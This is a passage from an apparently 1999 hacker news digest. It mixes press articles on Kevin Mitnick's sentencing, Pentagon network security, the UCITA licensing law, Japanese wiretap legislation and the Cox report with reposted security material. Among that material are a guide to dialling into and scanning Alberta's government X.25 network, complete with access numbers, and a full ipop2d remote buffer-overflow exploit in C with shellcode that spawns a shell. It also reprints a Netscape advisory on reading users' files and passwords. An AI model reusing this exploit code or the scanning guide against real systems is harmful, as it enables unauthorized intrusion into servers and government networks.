violent crimes like robbery and assault. Their protest Friday will be seeking a more lenient sentence.
The U.S. attorney for the Central District of California said Mitnick will be sentenced to 46 months in prison on June 14 as part of
his plea bargain agreement with the government.
Mitnick, whose exploits as a hacker inspired an upcoming Hollywood movie, also will be obliged to pay the victims of his crimes
from any profits he makes from books or movies about his life, a spokesman for the U.S. attorney's office said.
While hacking incidents may not be part of Friday's nationwide protest, there may be a surge in attacks across the Internet if
Mitnick's sentence is perceived as too stiff, said John Vranesevich, the founder and director of AntiOnline.
"Hackers attack when they're mad about something. The demonstration Friday will be an attempt to educate," said Vranesevich.
"However, if Kevin Mitnick is put in jail, there very well could be more attacks after that."
Still, other experts said Internet sites should upgrade their security against possible attack before Friday.
"Given the timing, it probably would be a good idea to be more on guard than usual," said Jevon Jaconi, the district attorney of
Kewaunee County, Wisconsin, and an expert in the developing field of cyberspace law.
Between 70 percent and 80 percent of all Internet hacking attacks come on systems that have not updated their security codes,
routinely sent by computer manufacturers and network administrators, Jaconi said.
The best way to prevent hacking attacks in the future is to heed those security warnings and implement the needed changes, he
said.
Washington Post;
Online Security Is Pentagon's Latest Battle
By John Schwartz
Washington Post Staff Writer
Wednesday, June 2, 1999; Page A2
The Department of Defense announced yesterday that it was briefly pulling
its computers off the Internet to upgrade security by installing hardier
"firewall" protection between computer systems that are accessible to the
outside world and those that should not be.
Noting the recent spate of hacker attacks on government Web sites,
Pentagon spokesman Kenneth Bacon said the upgrade is part of a
long-term computer security effort: "This is much more protective than
reactive."
In fact, the Defense Department is engaged in long-term planning that
could completely move its unclassified networks off the Internet and on to
a proprietary system. The GNIE project (Global Network Information
Enterprise, pronounced "genie") will unveil this major proposal this
summer, said DOD spokeswoman Susan Hansen. "A lot of systems over
the years have been patched together," she said, and "of course, you're
only as strong as your weakest link."
Skirmishes between federal law enforcement officials and computer
intruders have been intensifying in recent weeks. Hackers angered by
about 20 recent FBI raids on suspected members of the loose-knit
computer underground have launched a variety of attacks on Web sites
maintained by the FBI, the Senate, the Interior Department and the White
House.
"For those who do this for whatever kind of sport it provides them, they'll
be found, and they'll be prosecuted," White House press secretary Joe
Lockhart said yesterday.
Securing government Web sites against attack is difficult because the sites
are designed for open access; that's why security-conscious computer
managers separate Web computer systems from those that contain critical
internal information.
In the case of the FBI computer intrusions, for example, "these are not the
internal systems that contain classified or top-secret information," said
Justice Department spokeswoman Carole Florman. "Those systems have
not been at risk, and they have not been compromised."
Instead, she said, the attacked sites are "the FBI's vehicle for
communicating with the public. . . . What they are really doing is denying
access to the American public to the information available on that Web
site."
FBI agents across the country have been focusing on a gang that calls
itself "Global Hell." The agents appear to be going after leading members
of the group and some peripheral figures, hoping to find bigger players,
said John Vranesevich, founder of antionline.com, a Web site that tracks
hacker activity.
Vranesevich called the hacker response "a tantrum," saying that "many of
them are now realizing for the first time that everything they've been doing
for the past few months [has] been watched."
Those targeted by the raids say that the agents are casting a very broad
net. Paul Maidman, 18, was asleep when FBI agents entered his
apartment. The New Jersey teen's mother had already left for work for
the day when a half-dozen armed agents grabbed Maidman's computer
and began hours of questioning.
Noting that he has no relationship with Global Hell but that he has sat in on
Internet chats where its members have congregated, Maidman said, "I'm
not really counting on getting it [the computer] back any time soon." He
added that he has shied away from computer mischief since he turned 18.
Maidman said that while the experience with the government agents was
intimidating, "they were actually really nice." When his 12-year-old sister
woke up, "they made her waffles," he said.
Experts in computer crime said the government reaction constitutes just
the latest wave of law enforcement efforts to curtail computer mischief.
"It's immensely foolish of the hacker underground to step up its assaults on
law enforcement sites," said Michael Godwin, author of the book "Cyber
Rights."
"These two cultures regard each other with such deep antagonism and
distrust that you might have to call in [veteran diplomat] Richard
Holbrooke to sort it out," Godwin said.
© Copyright 1999 The Washington Post Company
@HWA
11.0 UCITA About to be Approved
~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Ryan.Russell
The Uniform Computer Information Transactions Act is
about to be approved. This draconian act will give
vendors the right to repossess software by disabling it
remotely (meaning you have to leave a port open on the
firewall? Just imagine the DoS possibilities.); prevent the
transfer of licenses from one party to another without
vendor permission (Does this include my copy of
LoadRunner for the Atari2600 that I sold for $5?);
outlaw reverse engineering (Whoa, no more third party
security analysis). This new law is being supported by
such software giants as Microsoft, Adobe, and WinPro.
The proposed legislation is set to go before the National
Conference of Commissioners on Uniform State Laws in
July. If this panel approves this measure it will then be
sent to state legislations around the country. (Good
way to bypass the feds.)
InfoWorld
http://www.infoworld.com/cgi-bin/displayStory.pl?/features/990531ucita.htm
National Conference of Commissioners on Uniform State Laws
http://www.2bguide.com/docs/040799pr.html
InfoWorld;
Licensing time bomb
Software-law dispute explodes as enactment draws near
By Jessica Davis
Imagine the horror of walking into work one day to find your software vendor holding your company hostage by threatening to shut down
your mission-critical systems unless you concede to its terms.
Sounds illegal, right? Perhaps not.
Although many IT professionals are unaware of it, that practice will become legally defensible if new legislation called the Uniform Computer
Information Transactions Act, or UCITA, is approved.
UCITA is a proposed law for applying consistent rules to computer software licenses across
all 50 states. It would
* give vendors the right to repossess software by disabling it remotely;
* make the terms of shrink-wrapped licenses more enforceable;
* prevent the transfer of licenses from one party to another without vendor permission;
* allow vendors to disclaim warrantees; and
* outlaw reverse engineering.
Proponents of the law, primarily software vendors, say it is time for a uniform law that applies
directly to software licenses. Critics, including technology consumer groups such as the
Society of Information Managers (SIM), say UCITA is fatally flawed and should be killed.
Other trade organizations representing the motion picture industry, newspapers, magazines, and the music recording industry, have joined
SIM in opposing UCITA.
In July, a state attorney organization known as the National Conference of Commissioners on Uniform State Laws (NCCUSL) will meet in
Denver to approve UCITA. If the organization gives the proposal a green light, a few state legislatures are likely to rubber-stamp it by the
end of the year and UCITA will become law, according to UCITA experts.
This fast time table has opponents up in arms. Although SIM is in favor of a law to govern software licensing, it says it believes UCITA
cannot be fixed.
"This law would significantly increase the level of the burden on the IT procurement function and significantly increase the cost of procurement
-- both in staff costs and out-of-pocket costs," says Susan Nycum, a SIM member and an attorney at law firm Baker & McKenzie, in Palo
Alto, Calif.
Although many software vendor representatives attended development meetings to discuss the law and lobbied its creators, most attendees
contacted by InfoWorld refused to discuss their views on the record.
And although this law threatens to profoundly affect how IT departments in both large and small companies do business, most IT
professionals remain unaware of the law and its ramifications.
"We were naive about how things were handled," says Randy Roth, a SIM member who also works at the Principal Financial Group, in Des
Moines, Iowa. "We thought, gee, when people are writing these laws they are making sure they are balanced and somebody is watching out
for our best interests."
Blackmail tool?
To the IT managers who have been following UCITA, perhaps the most threatening provision is vendor "self-help," or vendor repossession
of software.
According to the most recent draft of the law, a vendor can remotely disable a customer's software if the vendor decides that the customer
has violated its license and the license includes language that says self-help is a possibility. The proposed law would require the vendor to
notify a company representative designated in the contract 15 days prior to taking such action, although it does not specify the means of
notifying that representative. Such messages could spend weeks languishing in voice mail or e-mail if the wrong person happens to be on
vacation.
"Self-help is a draconian remedy in which the licensor would act as judge, jury, and executioner to electronically disable or repossess
software when in its self determination, the licensee has done something bad," says Barney Kantar, a member of SIM who also works at
Dupont, in Wilmington, Del.
UCITA's champions counter that the software market would not tolerate vendors who shut off customers' software.
"So far the market has been a very good disciplinarian," says Micalyn Harris, vice president, secretary, and general counsel at Winpro, in
Ridgewood, N.J. "Anyone who gets a reputation for shutting off software on customers is not very likely to stay in business."
But fear of getting a bad reputation has not stopped vendors from taking such draconian measures in the past. The most extreme case of a
vendor repossessing software happened almost 10 years ago. Logisticon, a software vendor in Santa Clara, Calif., shut down Revlon
Group's systems over the phone lines because it said Revlon had not paid the remaining $180,000 balance of a $1.2 million contract for
warehouse management software. In a subsequent lawsuit, Revlon claimed its shipping operations were shut down for three days. The case
was settled out of court in late 1990. As part of the settlement, the parties agreed not to divulge the terms.
Because UCITA specifically authorizes electronic self-help, critics say that software developers would have legal justification to build back
doors and software time bombs in their programs. That itself would create a tremendous threat and reduce users' negotiating power, whether
the license specified the self-help rights or not.
"The real danger of self-help is not so much that it will be invoked, but rather that it will be used as a threat hanging over licensees in order to
extort compromises, concessions, and other payments that they would not otherwise agree to provide," Dupont's Kantar adds.
Adobe Systems corporate counsel Vincent Bryan, however, argues that according to current law, a vendor could shut down a customer
without any notice. The self-help provisions of UCITA, he says, are designed to protect the software customer.
"What [the self-help provision] attempted to do was to reach a compromise between what SIM wanted -- which was that you had to go to
court and trial before a small licensor could get paid," Bryan says.
John McCabe, NCCUSL legal counsel and legislative director, calls UCITA's provisions on vendor self-help a middle position.
"We are not banning this; we are not requiring judicial permission," McCabe says. "We are just putting parameters around it."
McCabe added that vendors are not permitted to exercise self-help if the vendors are aware of third parties that could suffer serious losses
because of it.
Although Microsoft's UCITA representative, senior corporate attorney Robert W. Gomulkiewicz, requested that he not be quoted, a
Microsoft public relations representative agreed that the law is designed to protect customers.
But the law's detractors dispute that vendor self-help provisions protect consumers, and they find this to be the most threatening aspect of the
proposed law.
"Once we have licensed a product and put it into mission-critical use, self-help becomes a blackmail tool," Principal's Roth says. "Customers
have no negotiating power at all."
Pass-alongs prohibited
Another UCITA provision could increase the costs of mergers and acquisitions by prohibiting the transfer of a software license from one
company to another without permission from the vendor. Many shrink-wrapped licenses have blanket restrictions on transferability already,
but vendors generally do not try to get a court to enforce them in a merger. UCITA would make those terms enforceable.
For example, if you have Microsoft Word on your computer, you will need to obtain permission from Microsoft to transfer that copy of
Word from Company A to Company B, according to Cem Kaner, a career software developer in Santa Clara, Calif., an attorney, and the
author of Bad Software: What to do when software fails.
"Imagine doing that for all the computer programs, utilities, drivers, printer drivers, clip art, fonts," Kaner says. "At some point the cost of
having lawyers inspect every utility to figure out how to transfer it becomes too high. What will happen is people will simply erase the hard
drives on the machines."
Software vendors argue that they are within their rights to limit the use of their products.
"Licenses tell users what it is that creators or providers of software regard as fair use," Winpro's Harris says.
Those definitions of fair use included in licenses have become more aggressive as the years have gone by, according to SIM, and often
include transfer restrictions.
"If I buy a book, I can't make a copy and sell it. But I can sell my copy of the book or I can give away my copy," Dupont's Kantar says.
"The same should be true for software."
However, UCITA transforms software from a product into a license to use this product, according to attorney Kaner.
"That flies in the face of how we have dealt with intellectual property in the past," Kaner says. "If you put something into the mass market,
your rights as far as transferability end when the first buyer gives you the money."
But some vendors believe that because software is fundamentally different from other products, it deserves new rules.
"What UCITA is doing is validating the terms [of sale] after you pay," Adobe's Bryan says. "The academic community and consumer groups
are saying that's not right -- the contract should be what the parties agree to at the time there is a transaction."
Bryan notes that airline tickets and rental-car reservations' licensing terms are not revealed until after sales are completed.
Not my fault
Another hotly contested provision of UCITA is one that allows vendors to disclaim warrantees for defective, buggy, or virus-infested
software.
Today, any features that a vendor demonstrates at a trade show or writes about in a product manual must be a working part of the product,
according to Kaner, because under current law, any statement or affirmation of fact by seller to buyer is part of the basis of the bargain.
"UCITA takes the notion of a warrantee by demonstration and guts it," Kaner says. "And in the mass market, UCITA makes it trivially easy
to disclaim warrantees."
Although proponents claim that the provisions in UCITA are not a change from the current law, other industry observers view UCITA as a
license for commercial developers to turn out buggier software.
"It says manufacturers are not liable for the poor quality of their products," according to Watts Humphrey, a fellow of the Software
Engineering Institute, a development institution with headquarters at Carnegie-Mellon University, in Pittsburgh. "I think that is bad for the
nation."
The licensing loopholes that UCITA provides will cause lowered standards for software performance and will cost user companies more
money because they will have to assure that the product works properly before they buy it, according to Baker & McKenzie's Nycum.
Software vendors counter that they need protection from customers in the fuzzy area of computer performance guarantees.
"If I have to guarantee that my software will perform the way you think it's going to perform, that's going to be costly for me," Winpro's
Harris says. "Software isn't like a piece of furniture -- there are many other variables."
But critics do not believe software companies need more legal protection than they already have.
"I have yet to hear a good argument as to why the software industry needs more than it has today," Dupont's Kantar says. "They are enjoying
double-digit growth and huge success in the marketplace. Why does the software industry need protection?"
Detractors also fear that UCITA will turn shrink-wrapped software licensing agreements -- which have become more and more restrictive
over time -- into enforceable law.
For example, many licensing agreements today state that customers who test the vendor's software are not allowed to publish the results of
those tests, Kantar says.
"We frequently see license agreements that attempt to restrict free speech in prohibitions against publishing test results," Kantar explains.
"UCITA would permit a licensor to restrict such fair use under a contract."
Many licensing agreements that come with shrink-wrapped software are "questionable at best," Principal's Roth says. "I would never put my
name on a contract like that, so why should I be forced to accept it if I'm going to buy a lot of shrink-wrapped software?"
Read the fine print
SIM members also say they believe that the cost of procurement will rise if UCITA becomes law because companies will have to scrutinize
shrink-wrapped software licenses as closely as those of mainframes and other large systems.
"Large companies spend about as much on shrink-wrapped software as they do on non-shrink-wrapped software," Kantar says. "Today
most businesses don't devote significant resources to the negotiation of shrink-wrapped licenses. They will now have to start doing so
because the default rules are shifting in favor of the licensor."
UCITA has other controversial provisions, leading the act's detractors to say it is too flawed to fix.
"If you are going to come up with a law that will last another 50 years, it needs to be written to be flexible and fair, and not [as] a wish list of
what vendors want right now," Baker & McKenzie's Nycum says.
Michael Lattig, Bob Trott, and Jeff Walsh contributed to this article.
www.infoworld.com
For more on Uniform Computer Information Transactions Act (UCITA), go to www.infoworld.com/UCITA.
Information about UCITA's precursor, the Uniform Commercial Code 2B draft, and subsequent motions are available at www.2bguide.com.
A list of National Conference of Commissioners on Uniform State Laws (NCCUSL) representatives is at
www.simnet.org/public/programs/issues/ucccode.html.
NCCUSL can be reached at www.nccusl.org.
The Society of Information Managers can be reached at www.simnet.org.
The origins of a law
The Uniform Computer Information Transactions Act (UCITA) began as a proposed change to the Uniform Commercial Code's Article 2,
which dealt with the sale of goods.
The Uniform Commercial Code (UCC) are laws designed to make commerce uniform from state to state. These laws are written by the
National Conference of Commissioners on Uniform State Laws (NCCUSL), a group founded in the late 19th century during the states' rights
movement and approved by the American Law Institute (ALI). The commissioners are attorneys, usually from small law firms, appointed and
paid for by the states to represent them to the Conference.
Once NCCUSL approves a bill, it is very likely to be passed by state governments.
The ALI advises NCCUSL on creating amendments to the UCC. ALI is largely an honorary, academic organization of tenured law
professors.
ALI officials called NCCUSL's 2B draft "unbalanced" and declined to put it to a membership vote at their annual meeting earlier this month.
NCCUSL decided then to make 2B a stand-alone bill, not part of the UCC. The proposed law then became known as UCITA. A current
draft of UCITA was not available at press time.
@HWA
12.0 Japan Follows Australia in Limiting Privacy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by erewhon
In an effort to to help law enforcement stop murders,
drug trafficking, gun running, and illegal immigration,
Japan is proposing new draconian legislation that will
give sweeping power to eavesdrop on all
communications. This includes telephone and email.
Wired
Japan: More Crime, Less Privacy
by David Lazarus
3:00 a.m. 2.Jun.99.PDT
TOKYO -- Privacy issues have taken center stage as Japan prepares to enact legislation allowing the police to eavesdrop on phone calls, intercept
fax and computer transmissions, and read email.
The draconian measures are ostensibly intended to help law enforcement halt premeditated murders, trafficking in drugs and guns, and smuggling of
illegal aliens into Japan.
At least that's what a bill cobbled together by the country's coalition government says.
The reality could be far more intrusive, especially after investigators receive an official green light to comb through private correspondence and
communications.
Japanese citizens' groups -- a hodgepodge of activists with little actual influence over policy decisions -- have decried the wiretapping legislation
as a gross invasion of privacy, and opposition politicians boycotted a vote on the legislation last Friday. But the government insists that what Japan
needs to restore public order is less civil liberty and more Big Brother.
People here are scared. Crime -- once unthinkable in Japan -- is on the rise. The country's yakuza racketeers are growing increasingly bolder in
their schemes as nearly a full decade of recession eats away at traditional revenue sources, such as payoffs from companies and corrupt
politicians.
For law-enforcement authorities, the trouble began back in 1995 when Aum Shinrikyo cultists released sarin gas in the Tokyo subway, killing a
dozen people. The cops simply never saw the attack coming, and have been agitating for greater surveillance powers as a means of preventing
such nastiness from happening again.
Wiretapping is a convenient shortcut for investigators. And, as the pervasive eavesdropping of former East Bloc countries made undeniably clear,
once authorities start listening it's a hard habit to break.
Yozo Marutake, a former senior executive with a manufacturer of hearing aids called Rion, said last week that the Japanese police have been
bugging phones for decades. How does he know this? Because his company sold the cops all their surveillance gear, and had done so since first
being approached by authorities in 1957, he said.
So why would the Japanese police now be seeking legal backing for their electronic skulking? One reason might have to do with charges from an
opposition politician last year that his phone had been bugged. The courts upheld the politician's claims, although the cops never actually admitted
being behind the incident.
The Internet undoubtedly will be a low priority at first for Japan's snoops, but this will change as more people, criminals included, go online. For
now, it looks like the cops are still unsure how to proceed where matters of cyberspace are concerned.
Police last week raided the Sapporo home of an 18-year-old who had posted a bunch of hit tunes on his home page using the MP3 compression
format. The teen, needless to say, hadn't worked out copyright issues in advance with related Japanese recording companies.
Police didn't reveal how they learned about the song-laden site. But they said they moved quickly to shut things down after concluding that illegal
actions were being perpetrated.
This only took them three months of monitoring downloads to figure out.
David Lazarus is on special assignment. He is filing occasional dispatches on the current state of business and technology in Japan.
@HWA
13.0 AGNPAC Revealed
~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Hack.Canada
A document describing the Alberta Government Packet
Switched Network (AGNPAC) has been released by Hack
Canada. This document goes into great detail about the
X.25 WAN that spans Alberta.
Hack Canada
http://www.hackcanada.com/homegrown/agnpac_guide.txt
Complete Guide to AGNPAC v1.0
CYB0RG/ASM
www.hackcanada.com
05.30.99
----------------
What is AGNPAC?
----------------
AGNPAC is the Alberta Government Packet Switched Network based on the X.25
protocol. It is a Wide Area Network which spans across Alberta. It is used
to connect systems and networks used by the Alberta Government, Alberta
Registries, hospitals, schools, libraries, and other such entities.
The backbone for this network is made up of full T1 fibre optic lines. Other
WAN's and nodes are connected to the AGNPAC backbone via T1, 128K Frame Relay
circuits (full CIR), and multiple 128K Frame Relay circuits. The network can
also be connected to through local dialups in most cities and large towns in
Alberta.
AGNPAC is built, managed, and maintained by Alberta Public Works Supply and
Service (PWSS) and funded by the Alberta provincial government. Recently
publicly funded school board use has also come into play with beta trials
becoming more widespread through the late nineties.
The AGNPAC network has been in existance since at least 1995, however, no
information regarding it has been publicly available... until now. There is
still much to learn about this network, and this file, the most complete
publicly available document on AGNPAC, is still somewhat lacking. However,
this file will be updated as new discoveries are made.
---------------------
Connecting to AGNPAC
---------------------
Dial ports exist in most major towns and cities across Alberta. The standard
communication parameter 8/N/1 is used although some systems on AGNPAC may use
7/E/1. When you connect you will see a message similar to this:
AGNPAC: 4007 030
-----------
Dial Ports
-----------
Athabasca 675-9424
Barrhead 674-2045
Blairmore 562-7426
Bonnyville 826-1753
Brooks 793-2254
Calgary 234-8066
Calgary 269-7425 v.34 only
Camrose 672-3689
Canmore 678-6966
Cardston 653-1006
Claresholm 625-2241
Drayton Valley 542-6038
Drumheller 823-4224
Edmonton 420-6198 v.34 only
Edmonton 425-5674
Edmonton 425-5691
Edmonton 429-1522
Edson 723-5352
Evansburg 727-3572
Fairview 835-5688
Fort McMurray 743-6302
Grande Cache 827-2044
Grande Prairie 539-0195
Hanna 854-2615
High Level 926-2142
High Prairie 523-2673
Hinton 865-1393
Jasper 852-4846
Lac La Biche 623-3832
Lethbridge 380-2067
Lloydminster 875-1237
Manning 836-2683
Medicine Hat 528-2135
Olds 556-2930
Oyen 664-2505
Peace River 624-1055
Pincher Creek 627-2444
Red Deer 341-4097
Rocky Mountain House 845-5552
Slave Lake 849-2826
Smoky Lake 656-2291
St. Paul 645-1847
Stettler 742-5581
Valleyview 524-2454
Vegreville 632-2213
Vermillion 853-6941
Wainwright 842-5103
Wetaskiwin 352-2384
Whitecourt 778-4677
------------------
System Addressing
------------------
Systems attached to AGNPAC are addessed most commonly by 9 digit Network User
Addresses (NUA's). That's 1 billion possible NUA's. These NUA's follow a
simple format of 9 consecutive digits (#########). Other NUA formats may
exist but the only exception to the 9 digit NUA that I know of is something
I call an "alias".
Aliases are acronyms preceded by a dot. These aliases resolve to a regular
NUA which is revealed when you connect to the host. Here are some examples of
known aliases and their corresponding NUA's:
.govtcpdial = 4004 11188
.cgsbbs = 4004 059010 (oddly enough this resolves to a 10 digit NUA)
Anyway, back to the NUA's. As far as I can tell the 9 digit NUA's have a 4
digit prefix and a 5 digit suffix. Or possibly they break down like this:
(####)(###)(##)
: : :
City Code? ..: : :
: :
Address Prefix? ........: :
:
System Address? .............:
But that's just a hunch I've got based on the NUA's that I know of. I also
have reason to believe there may be system subaddressing, or Logical Channels
(LCN), in which case the address may be suffixed with 1 or 2 digits to
connect to a subaddress of the system. And there may also be mnemonics, data
characters which follow the address preceded by a comma. Mnemonics are used
to connect to sub-systems of the host system. But again, this is all just
speculation for now.
----------------------------
Connecting to a Host System
----------------------------
To connect to a system you enter it's NUA and if it is valid you will get a
message like this:
AGNPAC: call connected to #### #####
Now you may receive an identifying message and the system's prompt depending
on the system, or you may get a connect message and no prompt at all.
Sometimes if you press <enter> it will forward you to the hosts prompt.
To disconnect from a host that you have connected to and get back to the main
prompt use the command "<ctrl>p clr".
For a list of known NUA's refer to the "AGNPAC NUA Directory" (agnpacnua.txt)
on www.hackcanada.com in the Canadian H/P-Hacking section.
---------------------
Command Line Options
---------------------
Some of these are used from the main prompt and some are used in conjunction
with an NUA. Further experimentation is still forthcoming.
Command Use Description
------- --------------------------- -------------------------------
c Closed User Group
clr Preceded by <ctrl>p Used to clear a circuit locally
f [Restricted] Fast Select
int Preceded by <ctrl>p ???
l Packet Size
n n ######### (where # is NUA) Normal call (default)
p p ######### (where # is NUA) Priority call
par? Displays parameters
reset Preceded by <ctrl>p Resets locally
set <par>:<val> [,<par>:<val>] Sets parameters
stat Displays statistics
-------------------
Scanning for NUA's
-------------------
The most important thing to know when scanning NUA's on AGNPAC is how to
disconnect from an NUA that you have connected to and get back to the main
prompt. This is done with the command "<ctrl>p clr". The second most
important thing to know is that you will be disconnected from AGNPAC after
ten failed attempts in a row. You will want to connect then disconnect from
a known good NUA after every 8 or 9 failed attempts.
---------------
Error Messages
---------------
More often than not when scanning for NUA's you will get an error message
rather than a call connected message. There are simply FAR more unassigned
NUA's than there are NUA's in use. Here is a guide to error messages and
their meanings.
AGNPAC: call cleared - address not in service
The most common message. It means the address is currently not assigned
to a host system.
AGNPAC: call cleared - access barred
The calling terminal is not permitted to establish a connection to the
host system. AGNPAC emits this error message on direction from the host.
It is a system that only accepts calls from specified originating NUA's.
AGNPAC: comma required before data characters
This message is common when you mistype an NUA. This message may refer to
the use of mnemonics to connect to sub-systems of the host as mentioned
in the "System Addressing" section of this file.
AGNPAC: call cleared - destination busy
The host system may just be temporarily busy, permanently busy, or down.
AGNPAC: call cleared - destination not responding
The host is ignoring your connect request or it is down.
AGNPAC: call cleared - remote directive
This is likely a clearing of the virtual circuit in response to a clear
request packet sent from the host system. The right subaddressing and/or
mnemonics can p
robably get by this.
AGNPAC: call cleared - local directive
This message indicates that the user has used the command "<ctrl>p clr"
to clear the virtual circuit in order to disconnect from an NUA.
AGNPAC: call cleared - temporary network problem
The host system is either temporarily or permanently down.
AGNPAC: invalid command
Invalid command line option.
AGNPAC: command not allowed
Command line option used improperly.
AGNPAC: invalid packet size
Command line option "l" was used in conjunction with an invalid packet
size.
AGNPAC: service option not subscribed
Some NUA's result in this message. I don't know why.
--------
Credits
--------
Shouts to The Clone and Wizbone for helping pioneer research on this network.
And to Deicide for the file "Introduction to Datapac" which gave me insight
into command line options.
Copyright (c) 1999 Hack Canada
@HWA
14.0 Bomb Making Info Available, For Nukes!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by akeldama
The Chinese are claiming that the recently released Cox
report that lambasted computer security at the
Department of Energy and pointed the finger at China
for stealing US Nuclear secrets was a total farce. China
is claiming that the nuclear 'secrets' it supposedly stole
are in fact freely available on the web, so just how
secret can they be. Better Grab your nuclear info before
it to disappears.
Internet News
http://www.internetnews.com/intl-news/article/0,1087,6_129241,00.htm
Federation Of American Scientists
http://www.fas.org/
China Says Nuke Data Is On Web
June 1, 1999
By Hans Lombardo
Managing Editor, asia.internet.com
International News Archives
[Hong Kong, CHINA] In a seething attack on the Cox Report, the Chinese government yesterday declared that performance data
on US nuclear warheads was available on the Web and in printed publications.
Zhao Qizheng, the information minister for China's State Council, told reporters in press conference that "performance data on the
seven types of nuclear warheads--W56, W62, W70, W76, W78, W87 and W88--have long been openly published in the United
States."
"In recent years, performance data about various types of nuclear warheads, ranging from the early MK-1 to the latest W88, can
easily be found on the Internet," stated Zhao.
The minister demonstrated how this nuclear warhead information was easily available on the website of the Federation of American
Scientists (FAS).
The FAS website provides users with a "Complete List of All U.S. Nuclear Weapons".
The Cox Report is the published findings of a US congressional probe lead by Republican Christopher Cox which alleges that China
plundered nuclear weapons secrets from the United State over the last two decades.
The Beijing regime has condemned the report as a politically motivated attempt by forces in the United States to damage US-China
relations and prevent China from developing into a economic power.
"the Chinese Government and people are strongly indignant over this groundless attack that fabricates facts and confuses black and
white," Zhao also said about the report.
"This is a great slander against the Chinese nation and is typical racial prejudice," Zhao added.
The Chinese government has also criticized the Cox Report's suggestion it that the United States intensify control over the export of
dual-purpose commodities and technology to China.
"It even unreasonably demands China should establish a so-called open and transparent system which enables American nationals
designated by the United States to examine on the spot the end-users without advance notice," said Zhao.
"This is a hegemonic act that disregards China's sovereignty and violates the basic norms governing international relations."
Some local infopreneurs are concerned that a possible US backlash against the export of technologies to China will have an impact
on China and Hong Kong's IT infrastructure development.
15.0 Exploit code for remote ipop2d security vulnerability that gives attacker a shell as user 'nobody'.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml
By c0nd0r, Sekure SDI.
/*
* Sekure SDI (Brazilian Information Security Team)
* ipop2d remote exploit for linux (Jun, 02 1999)
*
* by c0nd0r <condor@sekure.org>
*
* (read the instructions below)
*
* Thanks to jamez, bahamas, dumped, bishop, slide, paranoia, stderr,
* falcon, vader, c_orb, marty(nordo!) and minha malinha!
* also to #uground (irc.brasnet.org) and #SDI (efnet),
* guys at el8.org, toxyn.org, pulhas.org
*
* Sincere Apologizes: duke (for the mistake we made with the wu-expl),
* your code rocks.
*
* Usage:
*
* SDI-pop2 <imap_server> <user> <pass> [offset]
*
* where imap_server = IMAP server at your box (or other place as well)
* user = any account at your box
* pass = the account's password
* offset = 0 is default -- increase if it's necessary.
*
* Example: (netcat rocks)
*
* (./SDI-pop ppp-666.lame.org rewt lame 0; cat) | nc lame.org 109
*
* ----------------------------------------------------------------
* HOWTO-exploit:
*
* In order to gain remote access as user nobody, you should set
* an IMAP server at your box (just edit the inetd.conf) or at
* any other machine which you have an account.
*
* During the anonymous_login() function, the ipop2d will set the
* uid to user nobody, so you are not going to get a rootshell.
* ----------------------------------------------------------------
*
*/
#include <stdio.h>
/*
* (shellcode)
*
* jmp 0x1f
* popl %esi
* movl %esi,0x8(%esi)
* xorl %eax,%eax
* movb %eax,0x7(%esi)
* movl %eax,0xc(%esi)
* movb $0xb,%al
* movl %esi,%ebx
* leal 0x8(%esi),%ecx
* leal 0xc(%esi),%edx
* int $0x80
* xorl %ebx,%ebx
* movl %ebx,%eax
* inc %eax
* int $0x80
* call -0x24
* .string \"/bin/sh\"
* grab your shellcode generator at www.sekure.org
*/
char c0d3[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
"\xff\xff/bin/sh";
main (int argc, char *argv[] ) {
char buf[2500];
int x,y=1000, offset=0;
long addr;
char host[255], user[255], pass[255];
int bsize=986;
if ( argc < 4) {
printf ( "Sekure SDI ipop2d remote exploit - Jun, 02 1999\n");
printf ( "usage:
(SDI-pop2 <imap server> <user> <pass> [offset];cat) | nc lame.org 109\n");
exit (0);
}
snprintf ( host, sizeof(host), "%s", argv[1]);
snprintf ( user, sizeof(user), "%s", argv[2]);
snprintf ( pass, sizeof(pass), "%s", argv[3]);
if ( argc > 4) offset = atoi ( argv[4]);
/* gimme the ret + offset */
addr = 0xbffff3c0 + offset;
fprintf ( stderr, "0wning data since 0x%x\n\n", addr);
/* calculation of the return address position */
bsize -= strlen ( host);
for ( x = 0; x < bsize-strlen(c0d3); x++)
buf[x] = 0x90;
for ( y = 0; y < strlen(c0d3); x++, y++)
buf[x] = c0d3[y];
for ( ; x < 1012; x+=4) {
buf[x ] = addr & 0x000000ff;
buf[x+1] = (addr & 0x0000ff00) >> 8;
buf[x+2] = (addr & 0x00ff0000) >> 16;
buf[x+3] = (addr & 0xff000000) >> 24;
}
sleep (1);
printf ( "HELO %s:%s %s\r\n", host, user, pass);
sleep (1);
printf ( "FOLD %s\r\n", buf);
}
@HWA
16.0 Netscape Communicator 4.x "view-source:" JavaScript based security vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml
Date: Tue, 1 Jun 1999 19:08:49 +0300
From: Georgi Guninski <joro@NAT.BG>
To: BUGTRAQ@netspace.org
Subject: Netscape Communicator "view-source:" security vulnerabilities
There is a security vulnerability in Netscape Communicator 4.6 Win95,
4.07 Linux (probably all 4.x versions) in the way
it works with "view-source:wysiwyg://1/javascript" URLs. It parses them
in a "view-source" window.
The problem is that it allows access to documents included in the parent
document via
ILAYER SRC="view-source:wysiwyg://1/" using find(). That allows reading
the whole parsed document.
Vulnerabilites:
Browsing local directories
Reading user's cache
Reading parsed HTML files
Reading Netscape's configuration ("about:config") including user's
email address, mail servers and password.
Probably others
This vulnerability may be exploited by using HTML email message.
Workaround: Disable JavaScript
Netscape is notified about the problem.
Demonstration is available at: http://www.nat.bg/~joro/viewsource.html
Regards,
